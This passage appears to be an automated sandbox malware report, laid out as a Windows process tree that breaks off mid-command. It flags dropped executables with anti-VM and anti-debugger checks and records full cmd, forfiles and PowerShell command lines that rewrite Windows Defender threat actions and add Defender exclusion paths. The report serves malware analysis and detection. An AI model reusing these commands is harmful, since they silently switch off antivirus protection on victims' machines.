      PID:1680
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffe29df9758,0x7ffe29df9768,0x7ffe29df9778
        5⤵
        
        PID:4148
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1632 --field-trial-handle=1704,i,15806169951568577092,8608361392073028057,131072 /prefetch:2
        5⤵
        
        PID:4304
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1844 --field-trial-handle=1704,i,15806169951568577092,8608361392073028057,131072 /prefetch:8
        5⤵
        
        PID:420
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2120 --field-trial-handle=1704,i,15806169951568577092,8608361392073028057,131072 /prefetch:8
        5⤵
        
        PID:2832
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2956 --field-trial-handle=1704,i,15806169951568577092,8608361392073028057,131072 /prefetch:1
        5⤵
        
        PID:360
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2964 --field-trial-handle=1704,i,15806169951568577092,8608361392073028057,131072 /prefetch:1
        5⤵
        
        PID:192
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4404 --field-trial-handle=1704,i,15806169951568577092,8608361392073028057,131072 /prefetch:1
        5⤵
        
        PID:5504
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4988 --field-trial-handle=1704,i,15806169951568577092,8608361392073028057,131072 /prefetch:8
        5⤵
        
        PID:5844
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4696 --field-trial-handle=1704,i,15806169951568577092,8608361392073028057,131072 /prefetch:8
        5⤵
        
        PID:5936
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4644 --field-trial-handle=1704,i,15806169951568577092,8608361392073028057,131072 /prefetch:8
        5⤵
        
        PID:6024

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4104

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:708

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5360

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:5384

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:6316
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:6392
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:6924
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:6724
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:1432
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:6936
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  PID:6380
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  PID:6748

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:6816
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:6904
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:6252
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:6364
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:6912
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:6388
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:6884
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  PID:5248
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  PID:5180

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:7060
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:7108
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:6628
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:2136
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:6124
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  PID:2432
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  PID:5292
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  PID:3428

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:5484

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4432

C:\Users\Admin\AppData\Local\Temp\7zS1AD6.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS1AD6.tmp\Install.exe it /NjUdidkyuY 385118 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5940
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:6288
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:4832
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:3596
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:692
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5584
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:2336
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:6432
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:6228
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5888
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:6084
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:1420
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:6688
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5796
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:2280
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:7088
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5288
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:6780
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:7012
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5140
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5300
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6956
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6196
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5860
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6980
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6972
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6476
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5956
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6184
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6676
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5552
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7136
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4124
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6328
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6236
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5048
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6276
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6096
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files 